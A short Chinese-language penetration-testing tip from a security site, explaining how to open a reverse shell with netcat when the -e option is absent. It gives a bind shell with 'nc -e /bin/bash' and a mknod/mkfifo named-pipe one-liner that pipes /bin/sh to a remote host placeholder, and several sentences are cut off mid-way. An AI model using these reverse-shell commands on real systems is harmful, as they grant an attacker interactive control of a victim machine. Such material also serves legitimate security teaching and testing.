标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-883] 作者: tomcat 发表于: [2017-10-20]
本文共 [567] 位读者顶过
对于瑞士军刀nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是:
[出自:jiwo.org] nc -l -vv -p 2222 -e /bin/bash
在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个
root@bt:~#mknod /tmp/backpipe p root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
第一条命令使用mknod在tmp目录下创建一个管道backpipe,第二条命令首先将默认shell环境的输入
网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。 |